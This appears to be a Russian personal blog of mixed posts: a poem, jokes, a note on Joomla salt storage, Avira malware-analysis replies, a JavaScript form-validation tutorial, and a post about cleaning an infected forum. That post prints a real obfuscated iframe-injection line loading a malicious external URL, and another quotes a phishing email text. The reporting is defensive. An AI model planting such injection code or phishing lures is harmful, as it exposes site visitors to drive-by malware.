Аниме: Yowamushi Pedal / Трусливый велосипедист
Музыка: Thousand Foot Krutch -- Phenomenon

Она смотрела на меня с каким то интересом, "что же я сделаю?" вырисовывая черным фломастером на моем лице линии, я смотрел ей в глаза, ее лицо было так близко ко мне.. в голове смешалась куча эмоций и мыслей, а сердце сжалось в ожидании принятия решения... и тут я проснулся. Ее рядом давным давно уже нет, но задавленные мною эмоции проскользнули опять в сердце. Оно до сих пор колотится после пробуждения, но я знаю что еще пол часа и сердце замедлит ритм, а я приступлю к решению каких то повседневных дел...

Драконий жемчуг на дорогу
Бросаю пригоршней и жду,
Когда стрельцу и козерогу,
Захочется забрать звезду.

Ведь в этот миг моя рассада,
Распустит алые цветы,
И пусть они для вас награда,
А для меня они - мечты...

при поддержке Phoebe-sama

Отличная надпись, чтобы подбодрить пассажиров!... или быть может не хотели чтобы "гадили" в самолете?

Joomla - так ли она безопасна?
Есть один момент который на текущий момент меня пугает - разработчики joomla изначально делали хеширование паролей в md5, сейчас сделали md5 с солью, вроде как бы оно должно быть на много безопаснее, но так ли оно на самом деле?
Возьмем к примеру информацию "Joomla Component com_juser (id) SQL injection Vulnerability", благодаря данному компоненту можно получить хеш пароля от старых версий джумлы и хеш:соль из более новых версий(замечу что для joomla компонентов имеющих дыры очень много), безопасность страдает за счет того что соль находится в той же ячейке, что и пароль пользователя.
Вариант для решения это скрытие соли в configuration.php, что могло бы защитить пароли, чьи хеши были получены. Генерация соли должна быть создана в процессе установки\обновления CMS.

Сделал вот такую презентацию ^^"

Список файлов и результатов, содержавшихся в архивах, приведен ниже:

ID файла Имя файла Объем (байты) Результат
26327090 USChamber.exe 24 KB MALWARE
26327636 4E5BB74DB46CB0FBBA09...C0 169 KB MALWARE
26327637 5892BF0C0804B8C57F9A...7B 169 KB MALWARE


Точные результаты по каждому файлу вы найдете в следующем разделе:

Имя файла Результат
USChamber.exe MALWARE

Файл 'USChamber.exe' отмечен как 'MALWARE'.Наши аналитики присвоили этой угрозе название TR/Spy.Zbot.WX.Относительно "TR/" речь идет о троянском коне, который в состоянии заполучит ваши данные, нарушить вашу частную сферу и производить нежелательные изменения системы.Образец распознавания будет добавлен при одном из следующих обновлений файла определения вирусов (VDF).

Вы также можете просмотреть результаты анализа по следующему адресу:
http://analysis.avira.com/samples/details.php?uniq...hpZVtJrT8RAL&incidentid=846725

Zusдtzlich finden Sie eine Ьbersicht aller Einsendungen hier:
http://analysis.avira.com/samples/details.php?uniq...jzPZmK1EEkZqUgj0D9hpZVtJrT8RAL


Примечание: Пожалуйста, обращайтесь со специфичными вопросами по адресу support@avira.com

С уважением,
Лаборатория анализа вирусов Avira

---------------------------------------------
Avira Operations GmbH & Co. KG
Kaplaneiweg 1, 88069 Tettnang, Германия
Телефон: +49 (0) 7542-500 0
Факс: +49 (0) 7542-525 10
Адрес в интернете: http://www.avira.com

Коммерческий директор: Тьярк Ауэрбах
Место нахождения: Г. Теттнанг
Торговый реестр: суд низшей инстанции г. Ульм HRB 630992
---------------------------------------------

Получил письмо якобы от компании U.S. Chamber of commerce official letter с вот таким содержанием и прикрепленным архивом, в котором находится exe файлик

Hello,

On the advice of your partners, we are sending you this letter. In the attached file you will find the offer of cooperation and common development of adjacent areas of our business. Thank you for your attention.

Удивился, что ни один из топовых антивирусов его не видит как вирус, хотя он таковым является(проверил что он делает в виртуальной среде XP под Ubuntu), опять отправил файлик в Avira

Буду ждать ответа)

Цитирую письмо мной полученное на информацию о вирусном коде

Список файлов и результатов приведены ниже:

ID файла Имя файла Объем (байты) Результат
26257597 info_infected_site.txt 943 Byte MALWARE


Точные результаты по каждому файлу вы найдете в следующем разделе:

Имя файла Результат
info_infected_site.txt MALWARE

Файл 'info_infected_site.txt' отмечен как 'MALWARE'.Наши аналитики присвоили этой угрозе название JS/IFrame.GU.Относительно \"JS/\" речь идет о вирусе Javascript.Образец распознавания будет добавлен при одном из следующих обновлений файла определения вирусов (VDF).
Вы также можете просмотреть результаты анализа по следующему адресу:
http://analysis.avira.com/samples/details.php?uniq...hpZVtJrT8RAL&incidentid=804288

Zusätzlich finden Sie eine Übersicht aller Einsendungen hier:
http://analysis.avira.com/samples/details.php?uniq...jzPZmK1EEkZqUgj0D9hpZVtJrT8RAL



Примечание: Пожалуйста, обращайтесь со специфичными вопросами по адресу support@avira.com

С уважением,
Лаборатория анализа вирусов Avira

---------------------------------------------
Avira GmbH
Kaplaneiweg 1, 88069 Tettnang, Германия
Телефон: +49 (0) 7542-500 0
Факс: +49 (0) 7542-525 10
Адрес в интернете: http://www.avira.com

Коммерческий директор: Тьярк Ауэрбах
Место нахождения: Г. Теттнанг
Торговый реестр: суд низшей инстанции г. Ульм HRB 630992
---------------------------------------------

Итак, сегодня нашел вирусный код на форуме заказчика, замечу что нашли мы его не сразу, поэтому наши поиски были даже в какой то мере интересны, итак на начальном этапе мы имели форум на IPB и доступ к нему через фтп(по защищенным протоколам и firewall с правилами по IP). Так же имелись жалобы со стороны пользователей на появляющиеся сообщения о вирусах.
Проверка несколькими антивирусами показала, что Kaspersky, Avast, и даже NOD32 - видят вредоносные ссылки, в свою очередь к сожалению Avira их не увидела =\\

javascript в файлах с маской *global*.js

document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>');

скриншот


инфицированная ссылка типа *.in/topic.php?b=486def4

Замечен в интернете 8 мая 2011 года

Психологический тест оптимиста.

Психолог:

— У вас умер дедушка.

Оптимист:

— А у меня еще один есть.

— И вы опаздываете на похороны.

— А я сяду в машину и по газам.

— Нет, вы боитесь ездить за рулем.

— А я выпью для храбрости бутылку водки.

— Вот! И вас, пьяного, останавливает ГАИшник.

— А я договорюсь.

— Не договоритесь — это женщина.

— А я познакомлюсь.

— Но она страшная.

— А я-то уже пьяный!

— Знаешь, когда «я не против!» сходит за правду? Когда человек орет и плюется…
"Друзья"

— Может сегодня пойти к ней и почистить ковёр?
— Тебе не кажется, что это уже перебор?
— ДА! Ради Бога, мне что надо показывать табличку «Сарказм» каждый раз, когда я открываю рот?
— У тебя есть табличка «Сарказм»?
"Теория большого взрыва"

Хаус (пациенту Скорой помощи): — Профессиональная спортивная травма?
Пациент: — Вообще-то я не…
Хаус: … не знакомы с понятием «сарказм»? Не волнуйтесь, это новый термин.
"Доктор Хаус"

Cтою я на кухне… Попиваю чаек… Темно ночь… И мне на душе так хорошо… Возьми да и ляпни «Пиздато». Папа за спиной откашлялся и заявил «Ага. Заебись! Иди cпать.»

В жизни есть два вида депрессии: весенняя — «Меня никто не любит» и осенняя «Да пошли вы все на @уй!»

…Бывают такие замечательные люди, мимо которых невозможно пройти. Так и хочется остановиться и дать в морду…

Иногда надо имитировать крушение корабля… чтобы с него сбежали крысы…

«Я лечу раны» — сказало Время. «Я окрыляю» — возразило Счастье. «А я раню, поднимаю до небес, а потом швыряю на землю» — коварно усмехнулась Любовь…

Не говори о себе плохо -- не делай за других их роботу.

Итак, разберу проверки на js для себя и для тех кому будет это интересно.
Данные методы проверки работают в FF, Opera, IE8 (в остальных не проверял).

Предположим что у нас есть форма, которая должна отправлять введенные данные на страницу reg.php методом POST с полями:
1. "Имя" (Обязательное поле, проверка на длину имени, допустим это будет минимум 2 символа)
2. "Телефон" (Запрет на ввод букв и символов, разрешим вводить только цифры, ну и использовать клавишу "Backspace" для стирания написанных символов, проверка на длину номера - минимум 9 цифр)
3. "E-mail" (Обязательное поле, проверка по маске)
4. "Пароль" (Обязательное поле, проверка на длину пароля, возьмем по стандарту 6 символов)
5. "Повтор пароля" (Обязательное поле, проверка что данные из этого поля совпадают с данными в поле "Пароль")
6. Checkbox "Согласен с правилами регистрации" (Флажок обязательно должен быть отмечен пользователем)
7. Кнопка "Зарегистрироваться" (При нажатии на кнопку проверяется форма и в случае успешной проверки производится отправка данных, иначе показывает ошибку с указанием на требования при заполнении определенного поля)

Изначальная форма в html будет выглядеть примерно так:
<form name="form" action="reg.php" method="post">
Имя*:<br/><input type="text" name="name" id="name"/><br/>
Телефон:<br/><input type="text" name="phone" id="phone"/><br/>
E-mail*:<br/><input type="text" name="email" id="email"/><br/>
Пароль*:<br/><input type="password" name="password" id="password"/><br/>
Повтор пароля*:<br/><input type="password" name="password1" id="password1"/><br/>
<input type="checkbox" name="consent" id="consent"/>Согласен с правилами регистрации*<br/>
<input type="submit" value="Зарегистрироваться"/>
</form>

Чтобы запустить проверку формы при нажатии на кнопку "Зарегистрироваться" добавим в тег form событие при нажатии submit, которое мы назовем valid_form
<form name="form" action="reg.php" method="post" onsubmit="return valid_form();">
...

Добавим в поле "Телефон" событие реагирующее на нажатие клавиши, которое будет проверять цифру вводят или нет, назовем его valid_key_number
...
Телефон:<br/><input type="text" name="phone" id="phone" onkeypress="return valid_key_number(event);"/><br/>
...

C формой мы закончили, теперь приступим к написанию javascript'а, который собственно и будет выполнять все проверки.
Создадим функцию valid_form, которая будет отвечать за проверку формы после нажатия кнопки регистрации, а так же введем в ней переменную valid, которая будет решать отправить форму или же выдать ошибку:
<script type="text/javascript">
function valid_form(){
 valid=true;
 ...
 return valid;
}
</script>

1.1 Поле "Имя" должно быть заполнено поэтому проверим чтобы поле было не пустым, и если оно пустое выдаем ошибку и прерываем отправку формы.
if(document.getElementById("name").value==""){
 alert("Пожалуйста заполните поле 'Имя'.");
 valid=false;
}

1.2 Поле "Имя" должно состоять из не менее чем двух символов, поэтому вводим дополнительную проверку.
if(document.getElementById("name").value.length<2){
 alert("Имя слишком короткое.");
 valid=false;
}

2. Поле "Телефон" должно состоять из не менее чем девяти символов - вводим проверку на длинну (запрет на ввод символов и букв мы введем чуть позже в функции valid_key_number).
if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
 alert("Номер телефона слишком короткий.");
 valid=false;
}

3.1. Поле "E-mail" обязательно - вводим проверку.
if(document.getElementById("email").value==""){
 alert("Пожалуйста заполните поле 'E-mail'.");
 valid=false;
}

3.2. Вводим проверку поля E-mail по маске, чтобы определить введен email или же набор символов.
if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
 alert("Неверный E-mail адрес.");
 valid=false;
}

4.1 Поле "Пароль" обязательно - вводим проверку.
if(document.getElementById("password").value==""){
 alert("Пожалуйста заполните поле 'Пароль'.");
 valid=false;
}

4.2 Поле "Пароль" должно состоять из не менее чем шести символов, поэтому вводим дополнительную проверку.
if(document.getElementById("password").value.length<6){
 alert("Пароль слишком короткий.");
 valid=false;
}

5.1 Поле "Повтор пароля" обязательно - вводим проверку.
if(document.getElementById("password1").value==""){
 alert("Пожалуйста заполните поле 'Повтор пароля'.");
 valid=false;
}

5.1 Проверяем совпадают ли поля "Пароль" и "Повтор пароля".
if(document.getElementById("password").value!=document.getElementById("password1").value){
 alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
 valid=false;
}

6 Флажок "Согласен с правилами регистрации" должен быть отмечен - вводим проверку.
if(document.getElementById("consent").checked==false){
 alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
 valid=false;
}

Теперь объединим все эти проверки в функцию valid_form.
<script type="text/javascript">
function valid_form(){
 valid=true;
 if(document.getElementById("name").value==""){
  alert("Пожалуйста заполните поле 'Имя'.");
  valid=false;
 }else{
  if(document.getElementById("name").value.length<2){
   alert("Имя слишком короткое.");
   valid=false;
  }else{
   if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
    alert("Номер телефона слишком короткий.");
    valid=false;
   }else{
    if(document.getElementById("email").value==""){
     alert("Пожалуйста заполните поле 'E-mail'.");
     valid=false;
    }else{
     if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
      alert("Неверный E-mail адрес.");
      valid=false;
     }else{
      if(document.getElementById("password").value==""){
       alert("Пожалуйста заполните поле 'Пароль'.");
       valid=false;
      }else{
       if(document.getElementById("password").value.length<6){
        alert("Пароль слишком короткий.");
        valid=false;
       }else{
        if(document.getElementById("password1").value==""){
         alert("Пожалуйста заполните поле 'Повтор пароля'.");
         valid=false;
        }else{
         if(document.getElementById("password").value!=document.getElementById("password1").value){
          alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
          valid=false;
         }else{
          if(document.getElementById("consent").checked==false){
           alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
           valid=false;
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
 return valid;
}
</script>

Напишем функцию valid_key_number, которая будет проверять нажатые клавиши в поле "Телефон" и разрешать нажатие лишь цифр (код клавиш от 48 до 57) и нажатие Backspace (код клавиши - 8).
function valid_key_number(e){
 e = (e) ? e : window.e;
 w = (e.keyCode) ? e.keyCode : e.which;
 if((w<48||w>57)&&w!=8) return false;
}

Итак, вот и все. Теперь соберем все что у нас есть и получим форму с разными проверками полей
<script type="text/javascript">
function valid_form(){
 valid=true;
 if(document.getElementById("name").value==""){
  alert("Пожалуйста заполните поле 'Имя'.");
  valid=false;
 }else{
  if(document.getElementById("name").value.length<2){
   alert("Имя слишком короткое.");
   valid=false;
  }else{
   if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
    alert("Номер телефона слишком короткий.");
    valid=false;
   }else{
    if(document.getElementById("email").value==""){
     alert("Пожалуйста заполните поле 'E-mail'.");
     valid=false;
    }else{
     if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
      alert("Неверный E-mail адрес.");
      valid=false;
     }else{
      if(document.getElementById("password").value==""){
       alert("Пожалуйста заполните поле 'Пароль'.");
       valid=false;
      }else{
       if(document.getElementById("password").value.length<6){
        alert("Пароль слишком короткий.");
        valid=false;
       }else{
        if(document.getElementById("password1").value==""){
         alert("Пожалуйста заполните поле 'Повтор пароля'.");
         valid=false;
        }else{
         if(document.getElementById("password").value!=document.getElementById("password1").value){
          alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
          valid=false;
         }else{
          if(document.getElementById("consent").checked==false){
           alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
           valid=false;
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
 return valid;
}
function valid_key_number(e){
 e = (e) ? e : window.e;
 w = (e.keyCode) ? e.keyCode : e.which;
 if((w<48||w>57)&&w!=8) return false;
}
</script>
<form name="form" action="reg.php" method="post" onsubmit="return valid_form();">
Имя*:<br/><input type="text" name="name" id="name"/><br/>
Телефон:<br/><input type="text" name="phone" id="phone" onkeypress="return valid_key_number(event);"/><br/>
E-mail*:<br/><input type="text" name="email" id="email"/><br/>
Пароль*:<br/><input type="password" name="password" id="password"/><br/>
Повтор пароля*:<br/><input type="password" name="password1" id="password1"/><br/>
<input type="checkbox" name="consent" id="consent"/>Согласен с правилами регистрации*<br/>
<input type="submit" value="Зарегистрироваться"/>
</form>

Посмотреть как работает данный код можно ТУТ.
Надеюсь вам пригодится данная статья.
При копировании статьи не забывайте оставлять ссылку на данную страницу.